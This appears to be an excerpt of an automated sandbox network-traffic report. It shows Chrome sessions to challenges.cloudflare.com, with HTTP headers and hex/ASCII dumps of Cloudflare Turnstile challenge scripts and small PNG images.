                                                        2024-09-13 13:06:33 UTC1369INData Raw: 64 65 6e 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65
                                                        Data Ascii: den",f.style.overflowY="auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.549742104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:34 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c285aefbf971821&lang=auto HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:34 UTC331INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:34 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 114164
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 8c285af4ab11438d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:34 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 66 59 41 62 70 35 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.fYAbp5={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65
                                                        Data Ascii: ntact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expired","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_description":"Send%20Fe
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 61 72 73 65 49 6e 74 28 67 48 28 31 36 31 36 29 29 2f 31 30 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 31 38 37 29 29 2f 31 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 36 37 37 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 35 36 32 39 35 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 36 32 33 29 5d 2c 65 4d 5b 67 49 28 38 30 31 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 33 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 69 66 28 68 33 3d 67 49 2c 65 4d 5b 68 33 28 38 30 31 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 33 28 38 30 31 29 5d 3d
                                                        Data Ascii: arseInt(gH(1616))/10)+-parseInt(gH(1187))/11*(-parseInt(gH(1677))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,562953),eM=this||self,eN=eM[gI(1623)],eM[gI(801)]=![],eM[gI(336)]=function(h3){if(h3=gI,eM[h3(801)])return;eM[h3(801)]=
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 29 2c 6f 5b 68 6b 28 32 39 35 29 5d 3d 3d 3d 69 2b 44 3f 73 28 6f 5b 68 6b 28 34 30 37 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 68 6b 28 38 38 30 29 5d 28 73 2c 6f 5b 68 6b 28 31 32 38 31 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 6f 5b 68 6b 28 34 38 33 29 5d 28 73 2c 6f 5b 68 6b 28 34 30 37 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 6c 29 7b 68 6c 3d 68 6b 2c 4f 62 6a 65 63 74 5b 68 6c 28 35 37 34 29 5d 5b 68 6c 28 31 32 34 30 29 5d 5b 68 6c 28 35 33 31 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 6c 28 31 34 31 33 29 5d 28 47 29 7d 7d 2c 66 33 3d 67 49 28 39 37 30 29 5b 67 49 28 31 36 30 31 29 5d 28 27 3b 27 29 2c 66 34 3d 66 33 5b 67
                                                        Data Ascii: ),o[hk(295)]===i+D?s(o[hk(407)](i,D),E):F||o[hk(880)](s,o[hk(1281)](i,D),h[D])):o[hk(483)](s,o[hk(407)](i,D),E),C++);return j;function s(G,H,hl){hl=hk,Object[hl(574)][hl(1240)][hl(531)](j,H)||(j[H]=[]),j[H][hl(1413)](G)}},f3=gI(970)[gI(1601)](';'),f4=f3[g
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 74 5a 4b 4b 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4d 68 45 6e 64 27 3a 68 70 28 31 36 30 30 29 2c 27 7a 45 55 41 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 69 72 79 72 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 69 63 46 54 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4c 7a 62 47 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 65 48 56 68 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 46 76 56 57 78 27 3a 66
                                                        Data Ascii: on(h,i){return h(i)},'tZKKr':function(h,i){return h(i)},'MhEnd':hp(1600),'zEUAF':function(h,i){return i==h},'iryrk':function(h,i){return h>i},'icFTT':function(h,i){return h<<i},'LzbGU':function(h,i){return h(i)},'eHVhv':function(h,i){return h-i},'FvVWx':f
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 64 5b 68 75 28 31 31 37 30 29 5d 28 4f 2c 50 29 7d 2c 27 4a 65 62 4a 43 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 68 76 29 7b 72 65 74 75 72 6e 20 68 76 3d 62 2c 64 5b 68 76 28 31 35 30 30 29 5d 28 4f 2c 50 29 7d 2c 27 56 59 5a 49 62 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 7c 50 7d 2c 27 4c 65 67 47 73 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 26 4f 7d 2c 27 75 71 7a 78 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 26 4f 7d 2c 27 43 4e 69 67 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2a 50 7d 2c 27 77 6a 4b 4f 42 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 2a 4f 7d 2c 27 61 68 52 42 53 27 3a 66 75 6e 63
                                                        Data Ascii: d[hu(1170)](O,P)},'JebJC':function(O,P,hv){return hv=b,d[hv(1500)](O,P)},'VYZIb':function(O,P){return O|P},'LegGs':function(O,P){return P&O},'uqzxn':function(O,P){return P&O},'CNigK':function(O,P){return O*P},'wjKOB':function(O,P){return P*O},'ahRBS':func
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 68 42 28 36 34 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 42 28 31 34 31 33 29 5d 28 64 5b 68 42 28 31 30 32 32 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 68 42 28 31 33 30 39 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 31 26 4e 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 68 42 28 31 34 31 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 44 3d 28 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 68 42 28 31 33 30 39 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 42 5b 4d 5d 3d 46 2b 2b
                                                        Data Ascii: hB(640)](j,1))?(J=0,H[hB(1413)](d[hB(1022)](o,I)),I=0):J++,N>>=1,x++);}E--,E==0&&(E=Math[hB(1309)](2,G),G++),delete C[D]}else for(N=B[D],x=0;x<G;I=I<<1|1&N,J==j-1?(J=0,H[hB(1413)](o(I)),I=0):J++,N>>=1,x++);D=(E--,0==E&&(E=Math[hB(1309)](2,G),G++),B[M]=F++
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 29 5d 5b 68 42 28 35 33 31 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 68 42 28 37 38 32 29 5d 28 32 35 36 2c 44 5b 68 42 28 34 33 38 29 5d 28 30 29 29 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 64 5b 68 42 28 32 37 30 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 68 42 28 31 34 31 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 42 28 34 33 38 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 68 42 28 34 36 34 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 68 42 28 31 32 39 30 29 5d 28 49 2c 31 29 7c 4e 26 31 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 68 42 28 31 34 31 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30
                                                        Data Ascii: )][hB(531)](C,D)){if(d[hB(782)](256,D[hB(438)](0))){for(x=0;x<G;I<<=1,d[hB(270)](J,j-1)?(J=0,H[hB(1413)](o(I)),I=0):J++,x++);for(N=D[hB(438)](0),x=0;d[hB(464)](8,x);I=d[hB(1290)](I,1)|N&1,J==j-1?(J=0,H[hB(1413)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4e 3d 64 5b 68 45 28 34 33 32 29 5d 28 47 2c 48 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 28 64 5b 68 45 28 31 34 36 36 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 45 28 31 33 30 39 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d
                                                        Data Ascii: ,M=0;!![];){switch(L[M++]){case'0':N=d[hE(432)](G,H);continue;case'1':J|=(d[hE(1466)](0,N)?1:0)*F;continue;case'2':H==0&&(H=j,G=o(I++));continue;case'3':F<<=1;continue;case'4':H>>=1;continue}break}switch(J){case 0:for(J=0,K=Math[hE(1309)](2,8),F=1;K!=F;N=
                                                        2024-09-13 13:06:34 UTC1369INData Raw: 28 63 2c 68 4f 2c 65 29 7b 65 3d 28 68 4f 3d 67 49 2c 7b 27 4f 4a 4f 6f 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 66 38 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 65 5b 68 4f 28 34 39 30 29 5d 28 66 36 2c 66 37 28 63 29 29 7d 7d 2c 66 39 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 50 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 68 50 3d 67 49 2c 66 3d 7b 27 6d 47 71 69 51 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 52 65 5a 4d 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 7a 49 49 66 62 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d
                                                        Data Ascii: (c,hO,e){e=(hO=gI,{'OJOoo':function(g,h){return g(h)}});try{return f8(c)}catch(g){return e[hO(490)](f6,f7(c))}},f9=function(c,hP,f,g,h,i,j,k){for(hP=gI,f={'mGqiQ':function(l,m){return l+m},'ReZMn':function(l,m){return l(m)},'zIIfb':function(l,m){return l-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.549743104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:34 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:34 UTC240INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:34 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 8c285af56bf54349-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.549745104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:35 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:35 UTC240INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:35 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 8c285af97b854346-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:35 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.549747104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:35 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c285aefbf971821&lang=auto HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:35 UTC331INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:35 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 115182
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 8c285afa7b0f32d9-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:35 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 66 59 41 62 70 35 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.fYAbp5={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30
                                                        Data Ascii: 20containing%20a%20Cloudflare%20security%20challenge","turnstile_feedback_report":"Having%20trouble%3F","turnstile_expired":"Expired","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 2d 70 61 72 73 65 49 6e 74 28 67 48 28 35 34 33 29 29 2f 31 30 2b 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 30 33 36 29 29 2f 31 31 2a 28 70 61 72 73 65 49 6e 74 28 67 48 28 36 36 31 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 34 32 30 36 30 39 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 33 30 31 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 4a 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 4a 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 67 4a 28 38 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 25 73 7d
                                                        Data Ascii: -parseInt(gH(543))/10+-parseInt(gH(1036))/11*(parseInt(gH(661))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,420609),eM=this||self,eN=eM[gI(1301)],eO=function(f,gJ,g,h,i,j,k,l,m){for(gJ=gI,g={},g[gJ(803)]=function(n,s){return n%s}
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 29 7d 7d 2c 65 53 3d 66 75 6e 63 74 69 6f 6e 28 67 58 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 58 3d 67 49 2c 64 3d 7b 27 78 67 4e 4c 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4b 72 5a 54 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 42 73 4e 53 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 43 4e 59 67 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 47 4d 44 76 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 65 43 44 6b 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27
